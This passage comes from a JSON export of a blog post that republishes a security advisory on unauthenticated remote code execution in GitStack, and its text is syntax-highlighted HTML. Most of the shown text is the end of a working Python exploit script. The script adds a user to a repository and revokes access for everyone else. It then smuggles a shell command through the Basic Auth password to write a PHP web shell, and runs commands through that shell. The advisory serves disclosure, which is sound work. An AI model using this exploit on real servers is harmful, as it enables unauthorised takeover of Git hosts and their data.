class=\"crayon-s\">&#8216;csrfmiddlewaretoken&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-59\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;The repository has been successfully created&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Repository already exist&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-60\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot create repository&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-61\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a5d28e06cc41422615881-63\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Add user to repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-64\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-66\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;added to&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;has already&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-67\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot add user to repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-68\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-70\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Disable access for anyone&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-71\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">delete<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;everyone&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-73\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;everyone removed from rce&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;not in list&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-74\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot remove access for anyone&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-75\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-76\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-77\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create backdoor in PHP&#8221;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-78\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/{}\/web\/index.php?p={}.git&amp;a=summary&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">HTTPBasicAuth<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;p &amp;&amp; echo &#8220;<span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;a&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span>&#8221; &gt; c:GitStackgitphpexploit.php&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-79\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stdout<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">errors<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;replace&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-81\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Execute command&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-82\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/web\/exploit.php&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;a&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-83\"><span class=\"crayon-i\">print<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stdout<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">errors<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;replace&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3557\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 15 Jan 2018 12:22:25 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack, which can then be used to trigger an unauthenticated remote code execution. GitStack is &#8220;a software that lets you setup your own private Git server for Windows. 
This means that you create a leading edge versioning system &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3557\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 GitStack Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136,17050],"class_list":["post-11120","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unauthorized-access"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11120"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11120\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11120"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}